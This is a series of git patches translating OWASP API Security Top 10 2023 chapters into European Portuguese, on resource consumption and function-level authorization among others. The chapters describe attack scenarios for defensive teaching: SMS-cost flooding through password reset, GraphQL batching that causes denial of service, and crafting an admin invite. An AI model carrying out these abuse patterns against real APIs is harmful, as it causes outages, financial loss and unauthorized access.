a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index cf2862b03..e2f1e4f6d 100644 
--- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -1,11 +1,11 @@ # API4:2023 Unrestricted Resource Consumption -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Average** | Prevalence **Widespread** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | | Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. | -## Is the API Vulnerable? +## A API é vulnerável? Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Sometimes required resources are made available by service 
@@ -25,9 +25,9 @@ inappropriately (e.g. too low/high): * Number of records per page to return in a single request-response * Third-party service providers' spending limit -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A social network implemented a “forgot password” flow using SMS verification, enabling the user to receive a one time token via SMS in order to reset their @@ -65,7 +65,7 @@ times. The back-end follows and requests Willyo to send tens of thousands of text messages, leading the company to lose thousands of dollars in a matter of minutes. -### Scenario #2 +### Cenário #2 A GraphQL API Endpoint allows the user to upload a profile picture. @@ -108,7 +108,7 @@ Because the API does not limit the number of times the `uploadPic` operation can be attempted, the call will lead to exhaustion of server memory and Denial of Service. -### Scenario #3 +### Cenário #3 A service provider allows clients to download arbitrarily large files using its API. These files are stored in cloud object storage and they don't change that @@ -121,7 +121,7 @@ clients immediately start pulling the new version. Because there were no consumption cost alerts, nor a maximum cost allowance for the cloud service, the next monthly bill increases from US$13, on average, to US$8k. -## How To Prevent +## Como Prevenir * Use a solution that makes it easy to limit [memory][1], [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such @@ -144,7 +144,7 @@ the next monthly bill increases from US$13, on average, to US$8k. setting spending limits is not possible, billing alerts should be configured instead. -## References +## Referências ### OWASP 
@@ -152,7 +152,7 @@ the next monthly bill increases from US$13, on average, to US$8k. * ["DoS Prevention" - GraphQL Cheat Sheet][6] * ["Mitigating Batching Attacks" - GraphQL Cheat Sheet][7] -### External +### Externas * [CWE-770: Allocation of Resources Without Limits or Throttling][8] * [CWE-400: Uncontrolled Resource Consumption][9] From 9174154082a6edcdb247eccc4f51971e707b0831 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:33:15 +0100 Subject: [PATCH 29/64] Update 0xd1-acknowledgments.md --- editions/2023/pt-pt/0xd1-acknowledgments.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/editions/2023/pt-pt/0xd1-acknowledgments.md b/editions/2023/pt-pt/0xd1-acknowledgments.md index 19bfb30a3..3ca938307 100644 --- a/editions/2023/pt-pt/0xd1-acknowledgments.md +++ b/editions/2023/pt-pt/0xd1-acknowledgments.md @@ -1,9 +1,9 @@ -# Acknowledgments +# Agradecimentos -## Acknowledgments to Contributors +## Agradecimento ao Contribuidores -We'd like to thank the following contributors who contributed publicly on -GitHub, or via other means: +Gostaríamos de agradecer às pessoas abaixo, as quais contribuíram publicamente +no GitHub ou por outros meios: 247arjun, abunuwas, Alissa Knight, Arik Atar, aymenfurter, Corey J. Ball, cyn8, d0znpp, Dan Gordon, donge, Dor Tumarkin, faizzaidi, gavjl, guybensimhon, Inês From 48821c7d477ebf3fc0adefd55f3839e909e01e6d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 26 Apr 2024 08:31:14 +0100 Subject: [PATCH 30/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 37 ++++++++++--------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index e2f1e4f6d..df4a7441f 100644 
--- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md
+++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md
@@ -3,27 +3,28 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Exploitation requires simple API requests. Multiple concurrent requests can be performed from a single local computer or by using cloud computing resources. Most of the automated tools available are designed to cause DoS via high loads of traffic, impacting APIs’ service rate. | It's common to find APIs that do not limit client interactions or resource consumption. Crafted API requests, such as those including parameters that control the number of resources to be returned and performing response status/time/length analysis should allow identification of the issue. The same is valid for batched operations. Although threat agents don't have visibility over costs impact, this can be inferred based on service providers’ (e.g. cloud provider) business/pricing model. | Exploitation can lead to DoS due to resource starvation, but it can also lead to operational costs increase such as those related to the infrastructure due to higher CPU demand, increasing cloud storage needs, etc. | +| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. 
Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (por exemplo, fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | ## A API é vulnerável? -Satisfying API requests requires resources such as network bandwidth, CPU, -memory, and storage. Sometimes required resources are made available by service -providers via API integrations, and paid for per request, such as sending -emails/SMS/phone calls, biometrics validation, etc. - -An API is vulnerable if at least one of the following limits is missing or set -inappropriately (e.g. too low/high): - -* Execution timeouts -* Maximum allocable memory -* Maximum number of file descriptors -* Maximum number of processes -* Maximum upload file size -* Number of operations to perform in a single API client request (e.g. GraphQL - batching) -* Number of records per page to return in a single request-response -* Third-party service providers' spending limit +Para atender aos pedidos feitos à API, são necessários recursos como largura de +banda de rede, CPU, memória e armazenamento. Às vezes, os recursos necessários +são disponibilizados por provedores de serviços por meio de integrações de API +e são pagos por pedido, como o envio de emails/SMS/chamadas telefónicas, +validação biométrica, etc. 
+ +Uma API é vulnerável se pelo menos um dos seguintes limites estiver ausente ou +definido inadequadamente (por exemplo, muito baixo/alto): + +* Tempos limite de execução +* Memória máxima alocável +* Número máximo de descritores de ficheiro +* Número máximo de processos +* Tamanho máximo de upload de ficheiro +* Número de operações a serem realizadas num único pedido do cliente da API + (por exemplo, agrupamento GraphQL) +* Número de registros por página a serem retornados num único pedido-resposta +* Limite de gastos de provedores de serviços terceiros ## Exemplos de Cenários de Ataque From c7204f5cef9678f208e864618b3baf7d59742b25 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 13:17:39 +0100 Subject: [PATCH 31/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 104 ++++++++++-------- 1 file changed, 56 insertions(+), 48 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index df4a7441f..6c8fd6a9e 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md 
@@ -30,12 +30,12 @@ definido inadequadamente (por exemplo, muito baixo/alto): ### Cenário #1 -A social network implemented a “forgot password” flow using SMS verification, -enabling the user to receive a one time token via SMS in order to reset their -password. +Uma rede social implementou um mecanismo de "recuperar senha" através da +verificação por SMS, permitindo que o utilizador receba um _token_ de uso +único via SMS para redefinir a sua senha. -Once a user clicks on "forgot password" an API call is sent from the user's -browser to the back-end API: +Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API +a partir do navegador do utilizador para a API de _back-end_: ``` POST /initiate_forgot_password @@ -46,8 +46,8 @@ POST /initiate_forgot_password } ``` -Then, behind the scenes, an API call is sent from the back-end to a 3rd party -API that takes care of the SMS delivering: +Em seguida, nos bastidores, é feita uma chamada API do _back-end_ para uma API +de terceiros que se encarrega da entrega do SMS: ``` POST /sms/send_reset_pass_code @@ -59,16 +59,16 @@ Host: willyo.net } ``` -The 3rd party provider, Willyo, charges $0.05 per this type of call. +O fornecedor de terceiros, Willyo, cobra $0.05 por este tipo de chamada. -An attacker writes a script that sends the first API call tens of thousands of -times. The back-end follows and requests Willyo to send tens of thousands of -text messages, leading the company to lose thousands of dollars in a matter of -minutes. +Um atacante escreve código que envia a primeira chamada API dezenas de milhares +de vezes. O _back-end_ prossegue e solicita à Willyo que envie dezenas de +milhares de mensagens de texto, levando a empresa a perder milhares de dólares +em questão de minutos. ### Cenário #2 -A GraphQL API Endpoint allows the user to upload a profile picture. +Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de perfil. ``` POST /graphql 
@@ -82,17 +82,17 @@ POST /graphql } ``` -Once the upload is complete, the API generates multiple thumbnails with -different sizes based on the uploaded picture. This graphical operation takes a -lot of memory from the server. +Uma vez concluído o carregamento, a API gera múltiplas miniaturas com diferentes +tamanhos com base na imagem carregada. Esta operação gráfica consome muita +memória do servidor. -The API implements a traditional rate limiting protection - a user can't access -the GraphQL endpoint too many times in a short period of time. The API also -checks for the uploaded picture's size before generating thumbnails to avoid -processing pictures that are too large. +A API implementa uma proteção tradicional de limitação de quantidade de pedidos +- um utilizador não pode aceder ao _endpoint_ GraphQL demasiadas vezes num curto +período de tempo. A API também verifica o tamanho da imagem carregada antes de +gerar as miniaturas para evitar o processamento de imagens demasiado grandes. -An attacker can easily bypass those mechanisms, by leveraging the flexible -nature of GraphQL: +Um atacante pode facilmente contornar esses mecanismos, aproveitando a natureza +flexível do GraphQL: ``` POST /graphql 
@@ -105,45 +105,53 @@ POST /graphql } ``` -Because the API does not limit the number of times the `uploadPic` operation can -be attempted, the call will lead to exhaustion of server memory and Denial of -Service. +Como a API não limita o número de vezes que a operação `uploadPic` pode ser +tentada, a chamada levará ao esgotamento da memória do servidor e à negação de +serviço (_Denial of Service_). ### Cenário #3 -A service provider allows clients to download arbitrarily large files using its -API. These files are stored in cloud object storage and they don't change that -often. The service provider relies on a cache service to have a better service -rate and to keep bandwidth consumption low. The cache service only caches files -up to 15GB. +Um prestador de serviços permite que os clientes descarreguem ficheiros +arbitrariamente grandes através da sua API. Estes ficheiros são mantidos em +armazenamento de objetos na nuvem e não mudam com frequência. O prestador de +serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço e +manter o consumo de largura de banda baixo. O serviço de _cache_ apenas armazena +ficheiros até 15GB. -When one of the files gets updated, its size increases to 18GB. All service -clients immediately start pulling the new version. Because there were no -consumption cost alerts, nor a maximum cost allowance for the cloud service, -the next monthly bill increases from US$13, on average, to US$8k. +Quando um dos ficheiros é atualizado, o seu tamanho aumenta para 18GB. Todos os +clientes do serviço começam imediatamente a descarregar a nova versão. Como não +havia alertas de custo de consumo, nem um limite máximo de custo para o serviço +de nuvem, a fatura mensal seguinte aumenta de 13 dólares, em média, para 8 mil +dólares. ## Como Prevenir -* Use a solution that makes it easy to limit [memory][1], - [CPU][2], [number of restarts][3], [file descriptors, and processes][4] such - as Containers / Serverless code (e.g. Lambdas). 
-* Define and enforce a maximum size of data on all incoming parameters and - payloads, such as maximum length for strings, maximum number of elements in - arrays, and maximum upload file size (regardless of whether it is stored - locally or in cloud storage). -* Implement a limit on how often a client can interact with the API within a - defined timeframe (rate limiting). -* Rate limiting should be fine tuned based on the business needs. Some API - Endpoints might require stricter policies. -* Limit/throttle how many times or how often a single API client/user can - execute a single operation (e.g. validate an OTP, or request password - recovery without visiting the one-time URL). +* Utilize uma solução que facilite a limitação de [memória][1], [CPU][2], + [número de reinícios][3], [descritores de ficheiros e processos][4], como + Containers / Código Serverless (por exemplo, Lambdas). +* Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos + de entrada, como comprimento máximo para _strings_, número máximo de elementos + em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de + ser armazenado localmente ou na nuvem). +* Implemente um limite de frequência com que um cliente pode interagir com a + API dentro de um período temporal definido (_rate limiting_). +* A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. + Alguns endpoints da API podem exigir políticas mais rigorosas. +* Limite/controle quantas vezes ou com que frequência um único cliente/utilizador + da API pode executar uma única operação (por exemplo, validar um OTP ou solicitar + a recuperação de senha sem visitar o URL de uso único). * Add proper server-side validation for query string and request body parameters, specifically the one that controls the number of records to be returned in the response. 
+* Adicione validação adequada no lado do servidor para parâmetros da _query string_ + e do corpo do pedido, especificamente aqueles que controlam o número de resultados + a serem retornados na resposta. * Configure spending limits for all service providers/API integrations. When setting spending limits is not possible, billing alerts should be configured instead. +* Configure limites de gastos para todos os fornecedores de serviços/integracões de + API. Quando não for possível definir limites de gastos, devem ser configurados + alertas de faturamento. ## Referências From 9043dc790de513d94ad428bf6614863fe1e64cc1 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 13:37:08 +0100 Subject: [PATCH 32/64] Update 0xa5-broken-function-level-authorization.md --- .../0xa5-broken-function-level-authorization.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 72f3b21cb..f5a97d938 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md 
@@ -3,9 +3,9 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. | +| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g., sub-utilizadores, utilizadores com mais do que um perfil). É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. 
As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | -## Is the API Vulnerable? +## A API é vulnerável? The best way to find broken function level authorization issues is to perform a deep analysis of the authorization mechanism while keeping in mind the user @@ -28,9 +28,9 @@ under a specific relative path, like `/api/admins`, it's very common to find these administrative endpoints under other relative paths together with regular endpoints, like `/api/users`. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 During the registration process for an application that allows only invited users to join, the mobile application triggers an API call to @@ -56,7 +56,7 @@ POST /api/invites/new Later on, the attacker uses the maliciously crafted invite in order to create themselves an admin account and gain full access to the system. -### Scenario #2 +### Cenário #2 An API contains an endpoint that should be exposed only to administrators - `GET /api/admin/v1/users/all`. This endpoint returns the details of all the @@ -65,7 +65,7 @@ checks. An attacker who learned the API structure takes an educated guess and manages to access this endpoint, which exposes sensitive details of the users of the application. -## How To Prevent +## Como Prevenir Your application should have a consistent and easy-to-analyze authorization module that is invoked from all your business functions. Frequently, such @@ -82,7 +82,7 @@ code. * Make sure that administrative functions inside a regular controller implement authorization checks based on the user's group and role. -## References +## Referências ### OWASP @@ -90,7 +90,7 @@ code. * "A7: Missing Function Level Access Control", [OWASP Top 10 2013][2] * [Access Control][3] -### External +### Externas * [CWE-285: Improper Authorization][4] 
From b3d7792ac950fd393e029122d39289a9699b685e Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:03:34 +0100 Subject: [PATCH 33/64] Update 0xa5-broken-function-level-authorization.md --- ...xa5-broken-function-level-authorization.md | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index f5a97d938..9009091af 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md 
@@ -7,26 +7,26 @@ ## A API é vulnerável? -The best way to find broken function level authorization issues is to perform -a deep analysis of the authorization mechanism while keeping in mind the user -hierarchy, different roles or groups in the application, and asking the -following questions: - -* Can a regular user access administrative endpoints? -* Can a user perform sensitive actions (e.g. creation, modification, or - deletion ) that they should not have access to by simply changing the HTTP - method (e.g. from `GET` to `DELETE`)? -* Can a user from group X access a function that should be exposed only to - users from group Y, by simply guessing the endpoint URL and parameters - (e.g. `/api/v1/users/export_all`)? - -Don't assume that an API endpoint is regular or administrative only based on -the URL path. - -While developers might choose to expose most of the administrative endpoints -under a specific relative path, like `/api/admins`, it's very common to find -these administrative endpoints under other relative paths together with regular -endpoints, like `/api/users`. +A melhor forma de identificar falhas de verificação de autorização de acesso a +funções é através duma análise detalhada do mecanismo de autorização, devendo +ter-se em consideração o esquema de hierarquia de utilizadores, diferentes +perfis ou grupos e questionando continuamente: + +* Utilizadores ordinários podem aceder aos _endpoints_ de administração? +* Os utilizadores podem realizar ações sensíveis (e.g. criar, modificar ou + apagar) para as quais não deveriam ter acesso, alterando simplesmente o método + HTTP (e.g. alterando de `GET` para `DELETE`)? +* Um utilizador do grupo X pode aceder a uma função reservada ao grupo Y, + adivinhando o URL do _endpoint_ e os parâmetros (e.g. + `/api/v1/users/export_all`)? + +Nunca assuma o tipo dum _endpoint_, normal ou administrativo, apenas com base no +URL. 
+ +Apesar dos programadores poderem ter decidido expor a maioria dos _endpoints_ +administrativos sob um mesmo prefixo, e.g. `api/admins`, é comum encontrarem-se +_endpoints_ administrativos sob outros prefixos, misturados com _endpoints_ +ordinários e.g. `api/users`. ## Exemplos de Cenários de Ataque From 52befe9ec348e7689fd78dad491f0ac46be9e692 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:04:27 +0100 Subject: [PATCH 34/64] Update 0xa4-unrestricted-resource-consumption.md --- .../pt-pt/0xa4-unrestricted-resource-consumption.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index 6c8fd6a9e..b1cbaa202 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md 
@@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Moderado** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (por exemplo, fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | +| A exploração requer pedidos simples de API. Múltiplos pedidos concorrentes podem ser feitos a partir de um único computador local ou utilizando recursos de computação em nuvem. A maioria das ferramentas automatizadas disponíveis são projetadas para causar DoS (Negação de Serviço) através de altas cargas de tráfego, afetando a taxa de serviço das APIs. | É comum encontrar APIs que não limitam as interações do cliente ou o consumo de recursos. 
Pedidos de API elaborados, como aqueles que incluem parâmetros que controlam o número de recursos a serem retornados e realizam análises de estado/tempo/comprimento de resposta, devem permitir a identificação do problema. O mesmo vale para operações em quantidade. Embora os agentes maliciosos não tenham visibilidade sobre o impacto nos custos, isso pode ser inferido com base no modelo de negócios/preços dos fornecedores de serviços (e.g. fornecedor de nuvem). | A exploração pode levar a uma Negação de Serviço (DoS) devido à escassez de recursos, mas também pode resultar num aumento dos custos operacionais, como os relacionados à infraestrutura devido à maior exigência de CPU, aumento das necessidades de armazenamento em nuvem, etc. | ## A API é vulnerável? @@ -14,7 +14,7 @@ e são pagos por pedido, como o envio de emails/SMS/chamadas telefónicas, validação biométrica, etc. Uma API é vulnerável se pelo menos um dos seguintes limites estiver ausente ou -definido inadequadamente (por exemplo, muito baixo/alto): +definido inadequadamente (e.g. muito baixo/alto): * Tempos limite de execução * Memória máxima alocável @@ -22,7 +22,7 @@ definido inadequadamente (por exemplo, muito baixo/alto): * Número máximo de processos * Tamanho máximo de upload de ficheiro * Número de operações a serem realizadas num único pedido do cliente da API - (por exemplo, agrupamento GraphQL) + (e.g. agrupamento GraphQL) * Número de registros por página a serem retornados num único pedido-resposta * Limite de gastos de provedores de serviços terceiros 
@@ -128,7 +128,7 @@ dólares. * Utilize uma solução que facilite a limitação de [memória][1], [CPU][2], [número de reinícios][3], [descritores de ficheiros e processos][4], como - Containers / Código Serverless (por exemplo, Lambdas). + Containers / Código Serverless (e.g. Lambdas). * Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos de entrada, como comprimento máximo para _strings_, número máximo de elementos em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de @@ -138,7 +138,7 @@ dólares. * A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. Alguns endpoints da API podem exigir políticas mais rigorosas. * Limite/controle quantas vezes ou com que frequência um único cliente/utilizador - da API pode executar uma única operação (por exemplo, validar um OTP ou solicitar + da API pode executar uma única operação (e.g. validar um OTP ou solicitar a recuperação de senha sem visitar o URL de uso único). * Add proper server-side validation for query string and request body parameters, specifically the one that controls the number of records to be From f3518c1d4f9a19d3d80aa4bf5dc0606f7316f20d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:05:03 +0100 Subject: [PATCH 35/64] Update 0xa2-broken-authentication.md --- editions/2023/pt-pt/0xa2-broken-authentication.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index 46525ca39..b8359f20e 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md 
@@ -103,7 +103,7 @@ de email da conta da vítima. * _Endpoints_ para recuperação de _password_ devem ser tratados como os _endpoints_ de _login_ no que diz respeito à proteção contra ataques de força bruta, limitação do número de pedidos e bloqueio de conta. -* Exija nova autenticação para operações sensíveis (por exemplo, alterar o +* Exija nova autenticação para operações sensíveis (e.g. alterar o endereço de email do proprietário da conta/número de telefone para autenticação de dois fatores). * Utilize a [OWASP Authentication Cheatsheet][1]. From 7ab91d4ecd0cffd35b4a18612cf105c6a135e017 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Fri, 17 May 2024 14:05:28 +0100 Subject: [PATCH 36/64] Update 0xa1-broken-object-level-authorization.md --- editions/2023/pt-pt/0xa1-broken-object-level-authorization.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 15541ad14..4ef1fe3a8 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -19,7 +19,7 @@ permissões para realizar a ação solicitada sobre o objeto alvo. As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de informações, modificação ou destruição de todos os dados. -Comparar o ID do utilizador da sessão atual (por exemplo, ao extraí-lo do +Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente para resolver a falha de Broken Object Level Authorization (BOLA). Esta abordagem pode endereçar apenas um pequeno subconjunto de casos. From fe4b3e55bcc181cf8901f5f0ad9ab5321b200845 Mon Sep 17 00:00:00 2001 
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Fri, 17 May 2024 14:05:50 +0100
Subject: [PATCH 37/64] Update 0xa5-broken-function-level-authorization.md

---
 editions/2023/pt-pt/0xa5-broken-function-level-authorization.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md
index 9009091af..9c2d47673 100644
--- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md
+++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md
@@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | -| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g., sub-utilizadores, utilizadores com mais do que um perfil). É mais fácil descobrir estas falhas em APIs dado que APIs são mais estruturadas, e aceder a diferentes funções é mais previsível. | Estas falhas permitem aos atacantes aceder de forma não autorizada a certas funcionalidades. As funcionalidades administrativas são o alvo preferencial neste tipo de ataqueo que pode levar a divulgação de dados, perda de dados, ou corrupção de dados. Por último, pode dar aso a uma disrupção de serviço. | +| Para abusar deste tipo de falha o atacante tem de realizar pedidos legítimos ao _endpoint_ da API ao qual não é suposto ter acesso como utilizadores anónimos, ordinários ou não privilegiados. _Endpoints_ expostos serão facilmente explorados. | As verificações de autorização para aceder a uma determinada função ou recurso são normalmente geridas por configuração ou ao nível da implementação. A correta implementação destes mecanismos pode tornar-se confusa, uma vez que, as aplicações modernas prevêem vários perfis ou grupos de utilizador, assim como complexos esquemas de hierarquias (e.g. sub-utilizadores, utilizadores com mais do que um perfil). 
